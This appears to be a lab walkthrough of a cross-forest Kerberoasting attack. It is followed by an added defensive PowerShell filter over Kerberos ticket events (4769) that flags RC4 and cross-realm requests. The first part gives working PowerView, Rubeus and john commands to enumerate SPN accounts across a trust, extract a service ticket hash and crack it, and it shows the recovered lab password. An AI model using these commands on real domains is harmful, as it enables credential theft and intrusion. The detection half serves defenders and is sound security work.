We will learn how to perform a cross-forest Kerberoasting attack.

First, load PowerView:

 . .\PowerView.ps1

Now let's find Kerberoastable users across the forest:

Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName} | select samaccountname,serviceprincipalname

Notice that the user storagesvc is Kerberoastable.

Now use Rubeus.exe to get the TGS:

.\Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:crosskerberoast.txt

As observed, we got the hash of the user.

Now crack it with john:

.\john.exe ..\..\crosskerberoast.txt --wordlist=..\..\kerberoast\10k-worst-pass.txt

And we got the password:

username: storagesvc
password: Qwerty@123
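
The defender's view of the same ticket request, as an added example that is not part of the original walkthrough: a filter over Kerberos service ticket events (Security event ID 4769) that flags RC4 tickets issued for user-backed SPNs and marks requesters from another realm. The event records are constructed sample data, and `OTHERFOREST.EXAMPLE`, the IP addresses and the function name `Find-SuspectedKerberoast` are assumptions made for illustration.

```powershell
# Constructed sample: selected fields of Security event 4769 as they would appear on
# an eu.local domain controller. Everything except storagesvc/eu.local is made up.
$sample = @(
    [pscustomobject]@{ TimeCreated = [datetime]'2024-01-10T09:14:02'; TargetUserName = 'alice@EU.LOCAL'
                       ServiceName = 'FILESRV01$'; TicketEncryptionType = '0x12'; IpAddress = '::ffff:10.0.5.20' }
    [pscustomobject]@{ TimeCreated = [datetime]'2024-01-10T09:20:41'; TargetUserName = 'bob@EU.LOCAL'
                       ServiceName = 'storagesvc'; TicketEncryptionType = '0x12'; IpAddress = '::ffff:10.0.5.31' }
    [pscustomobject]@{ TimeCreated = [datetime]'2024-01-10T11:03:17'; TargetUserName = 'user1@OTHERFOREST.EXAMPLE'
                       ServiceName = 'storagesvc'; TicketEncryptionType = '0x17'; IpAddress = '::ffff:10.9.0.44' }
)

function Find-SuspectedKerberoast {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [string] $LocalRealm = 'EU.LOCAL'   # realm of the DC that logged the events
    )
    foreach ($e in $Events) {
        # Computer accounts (name ends in $) and krbtgt have long random keys;
        # the tickets worth cracking belong to SPNs registered on user accounts.
        if ($e.ServiceName -like '*$' -or $e.ServiceName -eq 'krbtgt') { continue }

        # 0x17 = RC4-HMAC, 0x18 = RC4-HMAC-EXP. AES tickets (0x11, 0x12) are skipped.
        if ($e.TicketEncryptionType -notin '0x17', '0x18') { continue }

        # TargetUserName is logged as user@REALM; compare the realm with our own.
        $realm = ($e.TargetUserName -split '@')[-1]
        [pscustomobject]@{
            TimeCreated = $e.TimeCreated
            Requester   = $e.TargetUserName
            Service     = $e.ServiceName
            EncType     = $e.TicketEncryptionType
            Source      = $e.IpAddress
            CrossRealm  = ($realm -ne $LocalRealm)   # -ne is case-insensitive
        }
    }
}

# Cross-realm hits first: only the third sample record is reported.
Find-SuspectedKerberoast -Events $sample |
    Sort-Object CrossRealm -Descending |
    Format-Table -AutoSize
```

A hit on an account such as storagesvc is also the cue to replace its password with a long random value (or move the service to a group managed service account), since the ticket is only useful to an attacker while the password is guessable.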